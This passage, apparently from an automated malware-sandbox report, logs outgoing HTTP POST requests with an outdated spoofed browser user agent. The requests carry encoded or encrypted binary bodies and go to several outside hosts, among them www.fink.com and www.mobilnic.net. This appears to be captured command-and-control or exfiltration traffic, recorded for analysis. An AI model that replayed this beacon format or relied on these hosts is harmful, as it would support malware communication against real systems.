70 6a 76 52 61 36 49 71 7a 4e 44 58 62 47 5a 68 6b 7a 35 2b 49 6a 69 34 6e 76 53 79 50 37 73 54 46 49 55 33 56 49 51 30 6d 65 49 6e 68 44 6b 31 54 48 53 78 56 76 44 36 5a 64 33 58 31 44 57 30 51 45 51 61 52 46 35 4e 4a 4d 61 6e 67 45 65 51 6a 42 37 6c 52 59 41 63 73 74 44 37 70 79 6b 34 4d 45 32 63 48 4e 66 53 45 63 51 6e 66 6b 56 53 72 62 56 55 39 59 41 2b 71 39 4b 30 34 4a 79 42 7a 2f 2f 4f 57 30 59 79 7a 75 52 45 74 77 57 6e 71 2f 6d 38 62 4f 77 75 35 6d 68 78 33 68 63 4e 49 32 76 37 6c 30 44 6d 72 50 35 73 61 65 31 53 64 36 54 4c 68 30 50 50 55 32 5a 34 64 46 74 4a 67 4c 42 56 66 35 30 35 59 36 42 37 36 58 6c 75 34 7a 7a 62 68 64 41 54 73 49 66 78 59 70 41 53 4d 2f 71 42 6e 72 55 57 48 31 76 2b 57 67 6e 45 72 52 4a 44 58 45 51 52 69 54 4e 6e 58 31 61 38 77 70 56 79 7a 39 52 5a 61 73 71 41 63 65 4e 31 4c 61 54 4a 56 42 55 70 68 74 57 4d 77 49 41 46 43 59 75 55 66 7a 74 44 77 76 57 44 4e 79 64 39 38 67 48 6d 46 47 59 3d Data Ascii: cfbA6SAjwmNgJALhc3tpFVPbGHaIwEpbVLzBE9la0g4VjJuSn9zkmRT1lCZKCVUFn6zPmkyo7mKaRDdz8C+tTaYpMkpN6X9V4sC4T1cnKr5oMO4KGVfwlfL0BxWTIgqmCDTxEqJKeE+Cw72OgvP6XYUC+NO9w7gphd6xlD4BEE5r4DV0EiPSBK4q6/XV45+Zla5zVcx4IIck6AVFzvKyP/ouiZ25QltQHNsdVwoZIcjQWJRqzs2RpjvRa6IqzNDXbGZhkz5+Iji4nvSyP7sTFIU3VIQ0meInhDk1THSxVvD6Zd3X1DW0QEQaRF5NJMangEeQjB7lRYAcstD7pyk4ME2cHNfSEcQnfkVSrbVU9YA+q9K04JyBz//OW0YyzuREtwWnq/m8bOwu5mhx3hcNI2v7l0DmrP5sae1Sd6TLh0PPU2Z4dFtJgLBVf505Y6B76Xlu4zzbhdATsIfxYpASM/qBnrUWH1v+WgnErRJDXEQRiTNnX1a8wpVyz9RZasqAceN1LaTJVBUphtWMwIAFCYuUfztDwvWDNyd98gHmFGY=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 30 32 38 51 51 6f 73 51 72 47 4e 47 39 45 6e 72 34 69 78 57 65 50 51 4b 51 51 58 52 62 54 74 4b 37 37 6f 50 46 38 6c 6a 53 72 6c 68 71 61 43 62 54 57 4f 72 70 2f 57 53 31 48 79 67 57 72 67 4b 37 4e 2b 55 76 49 58 63 62 52 74 53 46 78 4d 4d 6a 31 41 79 61 6d 4a 4a 54 41 6c 70 4b 6b 64 7a 39 6c 76 37 46 31 37 37 67 4b 71 41 4b 50 71 65 36 42 77 67 36 66 6e 43 37 6c 6f 79 70 4a 4f 6d 65 58 78 4f 49 2b 46 76 4c 51 67 66 45 59 51 42 6d 70 43 74 64 36 50 36 50 32 6a 50 6e 63 39 65 54 45 6c 50 50 37 39 68 7a 53 46 73 4d 54 6b 72 57 79 41 6b 71 43 6c 65 37 45 51 33 31 36 4b 58 67 72 2b 69 72 59 43 53 6f 76 4d 59 64 6f 38 6f 64 34 36 64 30 77 48 52 49 36 75 68 64 4b 48 41 30 75 4b 32 78 42 71 72 4c 68 56 61 55 54 42 61 73 55 50 39 74 49 45 6b 4d 79 6c 41 4a 38 70 2b 42 62 56 67 5a 4e 6e 66 41 54 74 43 6e 42 46 4d 55 42 6d 6f 43 35 71 63 56 5a 6c 65 55 42 2b 7a 42 6b 47 63 6e 55 45 76 59 47 2f 53 53 4b 67 6c 56 52 72 53 63 57 2f 7a 72 79 6a 50 66 68 47 63 79 6a 4a 4b 78 36 35 36 33 6a 47 6a 31 43 46 31 5a 35 66 5a 54 49 43 74 66 4f 64 38 2f 62 73 73 76 6a 46 65 4f 45 70 4e 4b 67 78 57 47 50 58 65 47 71 63 4b 45 64 69 31 41 6a 48 5a 38 75 5a 39 76 34 50 33 67 44 37 6c 76 64 52 76 45 4d 57 74 53 4c 71 72 6a 59 76 74 7a 42 74 67 61 43 62 42 58 34 49 4f 6d 73 55 66 5a 76 6c 61 6f 53 74 77 79 78 42 56 7a 79 57 36 64 52 7a 4d 71 6f 35 6d 30 5a 4a 62 78 31 6e 69 4c 68 7a 44 41 69 38 56 69 77 6c 75 58 48 53 44 49 55 30 37 58 48 6e 37 38 36 37 64 6f 52 53 6b 62 64 75 42 70 59 58 66 70 38 46 75 72 4d 68 6e 2f 37 4a 61 51 69 69 77 4d 48 32 33 6c 77 37 43 4d 70 68 78 76 38 59 54 59 58 72 64 42 6e 33 55 57 31 30 49 Data Ascii: 028QQosQrGNG9Enr4ixWePQKQQXRbTtK77oPF8ljSrlhqaCbTWOrp/WS1HygWrgK7N+UvIXcbRtSFxMMj1AyamJJTAlpKkdz9lv7F177gKqAKPqe6Bwg6fnC7loypJOmeXxOI+FvLQgfEYQBmpCtd6P6P2jPnc9eTElPP79hzSFsMTkrWyAkqCle7EQ316KXgr+irYCSovMYdo8od46d0wHRI6uhdKHA0uK2xBqrLhVaUTBasUP9tIEkMylAJ8p+BbVgZNnfATtCnBFMUBmoC5qcVZleUB+zBkGcnUEvYG/SSKglVRrScW/zryjPfhGcyjJKx6563jGj1CF1Z5fZTICtfOd8/bssvjFeOEpNKgxWGPXeGqcKEdi1AjHZ8uZ9v4P3gD7lvdRvEMWtSLqrjYvtzBtgaCbBX4IOmsUfZvlaoStwyxBVzyW6dRzMqo5m0ZJbx1niLhzDAi8ViwluXHSDIU07XHn7867doRSkbduBpYXfp8FurMhn/7JaQiiwMH23lw7CMphxv8YTYXrdBn3UW10I
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 30 77 75 4d 71 41 59 46 77 47 4e 64 79 61 73 42 49 5a 6a 46 54 43 6d 67 4d 63 5a 6d 64 33 6a 70 6d 6a 45 61 42 61 61 76 75 51 30 43 49 64 6c 53 38 35 66 72 2f 6a 4a 47 44 6c 37 30 59 70 49 54 5a 42 79 48 55 6c 70 6a 73 71 59 35 63 74 6b 71 35 53 2f 37 39 4d 59 52 66 36 52 33 44 2f 78 70 4c 42 74 4e 74 55 59 57 7a 71 59 4e 38 32 62 58 76 4d 6a 68 4c 38 53 70 4f 58 36 76 6a 38 65 70 58 43 6e 30 39 46 2b 4a 30 39 4e 4e 5a 47 6e 35 7a 2f 75 79 6b 43 76 2b 51 67 6c 41 41 52 34 33 2b 5a 46 61 36 4f 79 31 76 70 55 53 70 44 45 79 32 6b 33 37 37 4f 6a 51 76 55 4e 62 6e 6d 68 59 48 42 4c 69 48 69 64 46 4f 42 2f 68 4d 34 35 77 63 38 37 79 57 57 74 44 45 51 6b 5a 6f 6b 4e 49 38 76 45 47 2f 42 64 45 66 71 73 30 51 70 35 65 6f 34 37 55 44 53 6d 51 58 7a 32 2f 41 42 57 66 6a 71 65 68 63 43 67 34 30 6b 56 30 76 58 38 46 6e 74 4e 2b 38 45 31 56 50 55 66 34 52 46 4a 59 7a 64 68 32 61 44 6c 53 63 34 41 51 6c 4f 48 55 70 2b 50 32 31 78 65 4a 67 2f 78 51 69 58 30 53 35 32 30 39 62 78 62 53 79 58 67 52 71 43 70 33 30 5a 6d 48 7a 78 77 37 79 43 2f 72 79 73 74 5a 69 62 2b 62 31 64 37 30 5a 59 2b 61 2b 64 6f 77 6c 42 78 68 4b 41 77 49 75 79 59 5a 6e 79 43 76 70 2f 6f 44 44 4c 46 53 68 62 38 69 64 61 74 7a 75 4f 64 56 62 7a 5a 74 4c 4c 34 57 6b 50 32 4b 70 6f 35 76 64 6e 69 49 2f 62 56 71 4a 38 4a 39 5a 61 66 31 73 37 51 6c 39 37 55 30 54 6f 52 49 2f 42 71 37 4a 6a 51 30 66 44 34 34 7a 50 2f 6e 6b 53 6f 61 45 53 4b 46 51 48 69 41 6d 5a 4d 39 7a 36 49 74 73 71 47 62 6d 76 6f 36 31 38 78 6c 32 4c 53 42 63 37 69 58 71 39 47 59 6b 71 72 6c 77 6d 76 6c 4d 37 61 30 67 68 67 67 45 65 4a 72 47 2b 5a 59 50 4e 7a 6a 36 4a 52 50 33 70 6d 77 55 67 5a 54 55 38 35 4e 2b 33 55 4d 73 41 33 34 36 67 3d 3d Data Ascii: 0wuMqAYFwGNdyasBIZjFTCmgMcZmd3jpmjEaBaavuQ0CIdlS85fr/jJGDl70YpITZByHUlpjsqY5ctkq5S/79MYRf6R3D/xpLBtNtUYWzqYN82bXvMjhL8SpOX6vj8epXCn09F+J09NNZGn5z/uykCv+QglAAR43+ZFa6Oy1vpUSpDEy2k377OjQvUNbnmhYHBLiHidFOB/hM45wc87yWWtDEQkZokNI8vEG/BdEfqs0Qp5eo47UDSmQXz2/ABWfjqehcCg40kV0vX8FntN+8E1VPUf4RFJYzdh2aDlSc4AQlOHUp+P21xeJg/xQiX0S5209bxbSyXgRqCp30ZmHzxw7yC/rystZib+b1d70ZY+a+dowlBxhKAwIuyYZnyCvp/oDDLFShb8idatzuOdVbzZtLL4WkP2Kpo5vdniI/bVqJ8J9Zaf1s7Ql97U0ToRI/Bq7JjQ0fD44zP/nkSoaESKFQHiAmZM9z6ItsqGbmvo618xl2LSBc7iXq9GYkqrlwmvlM7a0ghggEeJrG+ZYPNzj6JRP3pmwUgZTU85N+3UMsA346g==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 66 58 2f 4b 2b 73 57 77 77 6d 4e 42 6a 41 73 75 37 47 76 39 49 6a 36 6c 64 58 69 54 34 7a 4b 51 79 5a 48 65 55 34 6e 45 6d 78 50 36 57 6d 6b 37 61 70 4c 66 42 35 49 69 44 62 43 73 6e 4f 4e 78 7a 74 63 6e 7a 41 47 63 7a 66 7a 6e 4d 52 4b 49 61 37 48 36 64 2f 58 6b 54 6e 62 34 69 44 62 61 77 59 35 32 4c 55 66 54 59 47 62 72 33 31 4f 7a 6e 45 31 71 6b 4b 7a 67 74 65 4d 58 35 4a 6d 36 35 2f 76 4e 62 58 53 74 6c 4c 4e 46 6a 76 6f 77 39 6b 75 38 6f 42 55 52 45 34 57 30 68 6a 33 62 4c 38 6a 36 30 50 76 2b 6e 74 76 38 76 33 79 75 4b 44 53 47 45 73 7a 48 55 41 51 62 45 77 77 74 6c 35 46 63 50 76 48 47 74 42 53 38 49 6e 70 7a 32 36 49 4c 30 78 57 2b 65 32 5a 39 30 74 38 68 36 65 4f 5a 6a 58 68 4c 69 53 6d 62 50 37 62 58 50 58 6c 41 54 73 49 34 4f 74 63 61 63 66 47 31 6b 36 4c 35 32 75 53 4b 2b 37 4c 35 67 6e 74 4e 42 63 7a 77 66 41 69 4c 67 45 46 2b 66 30 2b 56 43 67 34 42 52 57 76 78 34 61 61 45 45 6a 75 62 34 44 67 4d 65 56 4d 62 6f 76 52 71 36 2f 6b 68 42 55 54 66 4a 62 6b 78 45 78 78 6f 4a 65 57 2b 69 79 65 38 46 50 5a 30 6c 65 66 79 48 69 46 36 41 4c 68 6c 63 4e 41 66 4b 58 54 4a 7a 63 61 2f 45 62 4a 4d 6e 4e 77 5a 6f 43 6d 49 37 37 55 64 31 4e 51 69 6b 37 4e 62 6a 5a 76 62 2b 7a 47 5a 42 36 30 54 66 35 38 44 41 30 4f 43 34 6a 52 46 30 67 4f 72 6b 6a 57 6c 6d 4a 4a 46 52 63 74 7a 2b 5a 6e 70 47 71 37 49 57 6a 52 41 61 49 32 2b 38 5a 44 67 33 38 6e 6e 42 51 6d 6e 2b 76 4f 68 76 56 49 72 6a 38 44 36 6d 44 63 44 67 76 6a 6e 4f 74 67 6e 46 61 57 41 4c 4d 51 6d 65 52 49 65 7a 46 72 42 6c 34 75 56 75 58 77 51 53 62 35 33 42 61 30 51 62 55 48 4a 79 47 45 50 70 75 58 44 7a 39 6a 73 37 38 41 6b 73 33 51 66 46 59 48 77 59 35 64 49 4a 76 39 46 74 69 78 69 62 35 2b 73 52 34 50 76 61 6a 36 35 55 4c 34 44 Data Ascii: fX/K+sWwwmNBjAsu7Gv9Ij6ldXiT4zKQyZHeU4nEmxP6Wmk7apLfB5IiDbCsnONxztcnzAGczfznMRKIa7H6d/XkTnb4iDbawY52LUfTYGbr31OznE1qkKzgteMX5Jm65/vNbXStlLNFjvow9ku8oBURE4W0hj3bL8j60Pv+ntv8v3yuKDSGEszHUAQbEwwtl5FcPvHGtBS8Inpz26IL0xW+e2Z90t8h6eOZjXhLiSmbP7bXPXlATsI4OtcacfG1k6L52uSK+7L5gntNBczwfAiLgEF+f0+VCg4BRWvx4aaEEjub4DgMeVMbovRq6/khBUTfJbkxExxoJeW+iye8FPZ0lefyHiF6ALhlcNAfKXTJzca/EbJMnNwZoCmI77Ud1NQik7NbjZvb+zGZB60Tf58DA0OC4jRF0gOrkjWlmJJFRctz+ZnpGq7IWjRAaI2+8ZDg38nnBQmn+vOhvVIrj8D6mDcDgvjnOtgnFaWALMQmeRIezFrBl4uVuXwQSb53Ba0QbUHJyGEPpuXDz9js78Aks3QfFYHwY5dIJv9Ftixib5+sR4Pvaj65UL4D
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 63 66 62 41 36 53 41 6a 77 6d 4e 67 4a 41 4c 68 63 33 74 70 46 56 50 62 47 48 61 49 77 45 70 62 56 4c 7a 42 45 39 6c 61 30 67 34 56 6a 4a 75 53 6e 39 7a 6b 6d 52 54 31 6c 43 5a 4b 43 56 55 46 6e 36 7a 50 6d 6b 79 6f 37 6d 4b 61 52 44 64 7a 38 43 2b 74 54 61 59 70 4d 6b 70 4e 36 58 39 56 34 73 43 34 54 31 63 6e 4b 72 35 6f 4d 4f 34 4b 47 56 66 77 6c 66 4c 30 42 78 57 54 49 67 71 6d 43 44 54 78 45 71 4a 4b 65 45 2b 43 77 37 32 4f 67 76 50 36 58 59 55 43 2b 4e 4f 39 77 37 67 70 68 64 36 78 6c 44 34 42 45 45 35 72 34 44 56 30 45 69 50 53 42 4b 34 71 36 2f 58 56 34 35 2b 5a 6c 61 35 7a 56 63 78 34 49 49 63 6b 36 41 56 46 7a 76 4b 79 50 2f 6f 75 69 5a 32 35 51 6c 74 51 48 4e 73 64 56 77 6f 5a 49 63 6a 51 57 4a 52 71 7a 73 32 52 70 6a 76 52 61 36 49 71 7a 4e 44 58 62 47 5a 68 6b 7a 35 2b 49 6a 69 34 6e 76 53 79 50 37 73 54 46 49 55 33 56 49 51 30 6d 65 49 6e 68 44 6b 31 54 48 53 78 56 76 44 36 5a 64 33 58 31 44 57 30 51 45 51 61 52 46 35 4e 4a 4d 61 6e 67 45 65 51 6a 42 37 6c 52 59 41 63 73 74 44 37 70 79 6b 34 4d 45 32 63 48 4e 66 53 45 63 51 6e 66 6b 56 53 72 62 56 55 39 59 41 2b 71 39 4b 30 34 4a 79 42 7a 2f 2f 4f 57 30 59 79 7a 75 52 45 74 77 57 6e 71 2f 6d 38 62 4f 77 75 35 6d 68 78 33 68 63 4e 49 32 76 37 6c 30 44 6d 72 50 35 73 61 65 31 53 64 36 54 4c 68 30 50 50 55 32 5a 34 64 46 74 4a 67 4c 42 56 66 35 30 35 59 36 42 37 36 58 6c 75 34 7a 7a 62 68 64 41 54 73 49 66 78 59 70 41 53 4d 2f 71 42 6e 72 55 57 48 31 76 2b 57 67 6e 45 72 52 4a 44 58 45 51 52 69 54 4e 6e 58 31 61 38 77 70 56 79 7a 39 52 5a 61 73 71 41 63 65 4e 31 4c 61 54 4a 56 42 55 70 68 74 57 4d 77 49 41 46 43 59 75 55 66 7a 74 44 77 76 57 44 4e 79 64 39 38 67 48 6d 46 47 59 3d Data Ascii: cfbA6SAjwmNgJALhc3tpFVPbGHaIwEpbVLzBE9la0g4VjJuSn9zkmRT1lCZKCVUFn6zPmkyo7mKaRDdz8C+tTaYpMkpN6X9V4sC4T1cnKr5oMO4KGVfwlfL0BxWTIgqmCDTxEqJKeE+Cw72OgvP6XYUC+NO9w7gphd6xlD4BEE5r4DV0EiPSBK4q6/XV45+Zla5zVcx4IIck6AVFzvKyP/ouiZ25QltQHNsdVwoZIcjQWJRqzs2RpjvRa6IqzNDXbGZhkz5+Iji4nvSyP7sTFIU3VIQ0meInhDk1THSxVvD6Zd3X1DW0QEQaRF5NJMangEeQjB7lRYAcstD7pyk4ME2cHNfSEcQnfkVSrbVU9YA+q9K04JyBz//OW0YyzuREtwWnq/m8bOwu5mhx3hcNI2v7l0DmrP5sae1Sd6TLh0PPU2Z4dFtJgLBVf505Y6B76Xlu4zzbhdATsIfxYpASM/qBnrUWH1v+WgnErRJDXEQRiTNnX1a8wpVyz9RZasqAceN1LaTJVBUphtWMwIAFCYuUfztDwvWDNyd98gHmFGY=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 6a 62 64 31 2f 62 56 32 75 6d 4e 46 50 69 43 6a 48 42 6a 67 4c 36 36 51 71 56 70 44 53 4a 53 36 75 55 5a 41 34 5a 49 50 4b 7a 79 36 4d 7a 37 55 45 31 37 4d 51 45 6a 34 57 39 36 37 56 71 4e 67 50 49 48 7a 5a 57 47 2b 76 70 31 4c 37 59 47 73 79 35 63 75 42 41 58 4a 5a 6c 75 39 4d 36 5a 49 35 58 36 78 30 41 54 34 56 43 6e 65 36 31 61 47 7a 73 65 69 36 4d 4b 41 32 41 57 45 6e 50 57 68 37 61 39 2b 4c 38 59 4d 44 52 41 74 55 64 75 48 34 67 64 70 4a 48 6e 76 32 47 4d 68 36 34 49 57 43 57 69 72 7a 56 2f 77 69 6b 63 4d 55 6f 32 39 6f 78 5a 59 46 46 46 61 64 72 6b 74 74 6b 67 70 4d 69 52 5a 4b 57 47 72 62 4b 2f 41 4c 7a 64 74 71 66 47 43 78 62 49 6e 32 42 4d 77 38 70 68 35 33 4e 71 69 76 6b 78 54 76 4e 33 6a 49 33 34 73 75 77 76 41 73 52 70 65 45 43 70 33 61 32 55 30 44 38 79 67 73 6c 6a 59 4f 35 71 44 73 6a 43 5a 30 6d 44 38 4c 44 79 56 68 50 7a 48 65 66 2f 65 30 2f 61 79 31 7a 65 59 67 73 30 56 52 56 2b 34 34 32 74 57 30 4f 6d 37 54 6d 2f 4a 32 5a 62 38 37 63 4a 4e 69 79 52 59 61 73 48 4f 39 76 32 7a 7a 4b 79 2f 61 58 4e 55 2b 68 7a 6e 2b 4e 73 53 55 78 41 78 48 6e 30 2f 56 6c 32 2f 6a 52 68 35 35 31 43 7a 5a 4a 36 4d 4f 65 6a 4d 48 36 51 48 6d 62 46 72 58 34 46 56 4d 37 63 44 4b 69 4d 4e 31 7a 55 4f 36 41 30 49 78 64 71 77 5a 35 4e 74 6f 6f 74 61 4e 59 32 6f 61 74 34 39 30 58 72 33 54 32 62 4a 35 4b 67 79 67 4d 57 58 6b 78 44 48 67 77 4c 68 66 38 32 66 32 74 64 58 69 42 73 37 67 38 68 6e 49 36 45 73 67 6d 4c 43 44 65 4c 6c 75 62 70 36 5a 73 30 55 77 51 52 72 34 49 79 57 69 57 62 71 6f 49 62 43 61 36 2b 37 45 4e 76 62 39 32 6f 78 4b 69 77 4a 39 66 33 68 67 54 4c 79 49 57 33 77 4b 31 73 55 49 74 42 35 35 2f 48 33 54 78 30 2b 35 57 66 41 35 44 73 76 4f 57 61 4d 73 7a 45 6e 7a 6e 77 4f 44 73 68 36 78 2b 51 62 Data Ascii: jbd1/bV2umNFPiCjHBjgL66QqVpDSJS6uUZA4ZIPKzy6Mz7UE17MQEj4W967VqNgPIHzZWG+vp1L7YGsy5cuBAXJZlu9M6ZI5X6x0AT4VCne61aGzsei6MKA2AWEnPWh7a9+L8YMDRAtUduH4gdpJHnv2GMh64IWCWirzV/wikcMUo29oxZYFFFadrkttkgpMiRZKWGrbK/ALzdtqfGCxbIn2BMw8ph53NqivkxTvN3jI34suwvAsRpeECp3a2U0D8ygsljYO5qDsjCZ0mD8LDyVhPzHef/e0/ay1zeYgs0VRV+442tW0Om7Tm/J2Zb87cJNiyRYasHO9v2zzKy/aXNU+hzn+NsSUxAxHn0/Vl2/jRh551CzZJ6MOejMH6QHmbFrX4FVM7cDKiMN1zUO6A0IxdqwZ5NtootaNY2oat490Xr3T2bJ5KgygMWXkxDHgwLhf82f2tdXiBs7g8hnI6EsgmLCDeLlubp6Zs0UwQRr4IyWiWbqoIbCa6+7ENvb92oxKiwJ9f3hgTLyIW3wK1sUItB55/H3Tx0+5WfA5DsvOWaMszEnznwODsh6x+Qb
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 66 58 2f 4b 2b 73 57 77 77 6d 4e 42 6a 41 73 75 37 47 76 39 49 6a 36 6c 64 58 69 54 34 7a 4b 51 79 5a 48 65 55 34 6e 45 6d 78 50 36 57 6d 6b 37 61 70 4c 66 42 35 49 69 44 62 43 73 6e 4f 4e 78 7a 74 63 6e 7a 41 47 63 7a 66 7a 6e 4d 52 4b 49 61 37 48 36 64 2f 58 6b 54 6e 62 34 69 44 62 61 77 59 35 32 4c 55 66 54 59 47 62 72 33 31 4f 7a 6e 45 31 71 6b 4b 7a 67 74 65 4d 58 35 4a 6d 36 35 2f 76 4e 62 58 53 74 6c 4c 4e 46 6a 76 6f 77 39 6b 75 38 6f 42 55 52 45 34 57 30 68 6a 33 62 4c 38 6a 36 30 50 76 2b 6e 74 76 38 76 33 79 75 4b 44 53 47 45 73 7a 48 55 41 51 62 45 77 77 74 6c 35 46 63 50 76 48 47 74 42 53 38 49 6e 70 7a 32 36 49 4c 30 78 57 2b 65 32 5a 39 30 74 38 68 36 65 4f 5a 6a 58 68 4c 69 53 6d 62 50 37 62 58 50 58 6c 41 54 73 49 34 4f 74 63 61 63 66 47 31 6b 36 4c 35 32 75 53 4b 2b 37 4c 35 67 6e 74 4e 42 63 7a 77 66 41 69 4c 67 45 46 2b 66 30 2b 56 43 67 34 42 52 57 76 78 34 61 61 45 45 6a 75 62 34 44 67 4d 65 56 4d 62 6f 76 52 71 36 2f 6b 68 42 55 54 66 4a 62 6b 78 45 78 78 6f 4a 65 57 2b 69 79 65 38 46 50 5a 30 6c 65 66 79 48 69 46 36 41 4c 68 6c 63 4e 41 66 4b 58 54 4a 7a 63 61 2f 45 62 4a 4d 6e 4e 77 5a 6f 43 6d 49 37 37 55 64 31 4e 51 69 6b 37 4e 62 6a 5a 76 62 2b 7a 47 5a 42 36 30 54 66 35 38 44 41 30 4f 43 34 6a 52 46 30 67 4f 72 6b 6a 57 6c 6d 4a 4a 46 52 63 74 7a 2b 5a 6e 70 47 71 37 49 57 6a 52 41 61 49 32 2b 38 5a 44 67 33 38 6e 6e 42 51 6d 6e 2b 76 4f 68 76 56 49 72 6a 38 44 36 6d 44 63 44 67 76 6a 6e 4f 74 67 6e 46 61 57 41 4c 4d 51 6d 65 52 49 65 7a 46 72 42 6c 34 75 56 75 58 77 51 53 62 35 33 42 61 30 51 62 55 48 4a 79 47 45 50 70 75 58 44 7a 39 6a 73 37 38 41 6b 73 33 51 66 46 59 48 77 59 35 64 49 4a 76 39 46 74 69 78 69 62 35 2b 73 52 34 50 76 61 6a 36 35 55 4c 34 44 Data Ascii: fX/K+sWwwmNBjAsu7Gv9Ij6ldXiT4zKQyZHeU4nEmxP6Wmk7apLfB5IiDbCsnONxztcnzAGczfznMRKIa7H6d/XkTnb4iDbawY52LUfTYGbr31OznE1qkKzgteMX5Jm65/vNbXStlLNFjvow9ku8oBURE4W0hj3bL8j60Pv+ntv8v3yuKDSGEszHUAQbEwwtl5FcPvHGtBS8Inpz26IL0xW+e2Z90t8h6eOZjXhLiSmbP7bXPXlATsI4OtcacfG1k6L52uSK+7L5gntNBczwfAiLgEF+f0+VCg4BRWvx4aaEEjub4DgMeVMbovRq6/khBUTfJbkxExxoJeW+iye8FPZ0lefyHiF6ALhlcNAfKXTJzca/EbJMnNwZoCmI77Ud1NQik7NbjZvb+zGZB60Tf58DA0OC4jRF0gOrkjWlmJJFRctz+ZnpGq7IWjRAaI2+8ZDg38nnBQmn+vOhvVIrj8D6mDcDgvjnOtgnFaWALMQmeRIezFrBl4uVuXwQSb53Ba0QbUHJyGEPpuXDz9js78Aks3QfFYHwY5dIJv9Ftixib5+sR4Pvaj65UL4D
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 62 64 59 36 4f 51 34 49 7a 57 4d 64 57 58 39 5a 6d 66 42 72 79 48 47 41 6e 39 30 4f 57 33 48 49 49 69 48 39 67 45 55 51 50 6d 66 33 47 44 67 34 6f 4e 79 52 72 6a 4d 69 48 54 78 30 32 45 75 4c 6b 46 61 5a 7a 6b 5a 4f 77 55 30 4d 5a 79 51 7a 5a 6d 45 78 48 47 6b 6f 49 37 70 58 72 64 68 51 4a 54 48 55 4c 54 31 51 35 52 34 58 6d 44 59 67 65 39 47 62 6a 39 68 51 56 71 73 76 2f 4b 32 6c 56 49 73 45 32 65 59 34 46 2f 65 6d 6e 68 62 67 54 45 63 2b 58 31 7a 2b 5a 70 52 4d 36 72 36 37 73 63 35 7a 63 67 4a 58 33 77 32 69 61 37 66 41 6c 6a 35 38 2f 6a 6e 35 4c 5a 64 68 2b 33 5a 66 77 54 5a 41 57 65 57 72 46 56 52 74 5a 69 66 31 46 39 32 68 54 53 67 76 38 31 58 6b 4a 55 4e 4d 6a 7a 47 56 71 68 50 70 42 66 59 30 51 6e 77 73 69 41 79 77 44 74 52 61 46 30 47 52 52 70 38 35 38 4f 56 68 31 61 2f 52 68 6b 7a 43 61 49 70 78 49 65 73 35 6e 6c 64 34 61 68 58 55 41 6f 6b 72 6c 43 6c 2f 2f 44 48 4b 53 54 30 4d 6e 54 75 33 6e 6e 50 68 35 62 4e 45 6b 63 48 2f 70 6b 30 61 66 4f 61 6c 56 52 78 4f 62 76 6c 63 41 48 58 49 53 6d 66 45 58 50 43 6f 7a 36 43 2b 44 61 64 66 53 2f 34 6d 34 57 51 6f 67 54 47 46 48 31 55 38 67 71 48 35 67 66 53 76 74 47 58 61 46 36 41 77 69 65 34 45 74 50 46 57 5a 64 54 68 4d 4d 38 6f 52 6d 54 58 46 56 4d 79 50 49 36 76 6a 43 49 78 73 73 49 42 37 47 49 45 39 78 62 70 65 42 50 58 5a 39 37 79 49 33 63 36 5a 4d 56 39 61 43 36 43 42 58 45 2f 56 32 39 77 30 68 5a 5a 44 31 63 69 37 6c 6c 52 4f 43 74 4e 78 32 6e 76 38 53 30 4b 6e 38 65 59 6a 58 56 79 48 6c 2b 4f 38 65 4a 34 54 46 66 73 73 6f 50 7a 70 37 48 6c 47 64 6c 57 34 68 37 76 65 33 6e 43 34 49 73 76 4f 4f 73 31 78 4b 63 33 6d 6c 35 53 38 73 71 78 2f 71 73 69 64 37 49 41 69 4f 50 30 74 64 44 4c 31 2f 6d 37 6f 49 73 50 6c 41 37 4e 72 57 7a 6c 2b 44 66 66 52 46 55 45 Data Ascii: bdY6OQ4IzWMdWX9ZmfBryHGAn90OW3HIIiH9gEUQPmf3GDg4oNyRrjMiHTx02EuLkFaZzkZOwU0MZyQzZmExHGkoI7pXrdhQJTHULT1Q5R4XmDYge9Gbj9hQVqsv/K2lVIsE2eY4F/emnhbgTEc+X1z+ZpRM6r67sc5zcgJX3w2ia7fAlj58/jn5LZdh+3ZfwTZAWeWrFVRtZif1F92hTSgv81XkJUNMjzGVqhPpBfY0QnwsiAywDtRaF0GRRp858OVh1a/RhkzCaIpxIes5nld4ahXUAokrlCl//DHKST0MnTu3nnPh5bNEkcH/pk0afOalVRxObvlcAHXISmfEXPCoz6C+DadfS/4m4WQogTGFH1U8gqH5gfSvtGXaF6Awie4EtPFWZdThMM8oRmTXFVMyPI6vjCIxssIB7GIE9xbpeBPXZ97yI3c6ZMV9aC6CBXE/V29w0hZZD1ci7llROCtNx2nv8S0Kn8eYjXVyHl+O8eJ4TFfssoPzp7HlGdlW4h7ve3nC4IsvOOs1xKc3ml5S8sqx/qsid7IAiOP0tdDL1/m7oIsPlA7NrWzl+DffRFUE
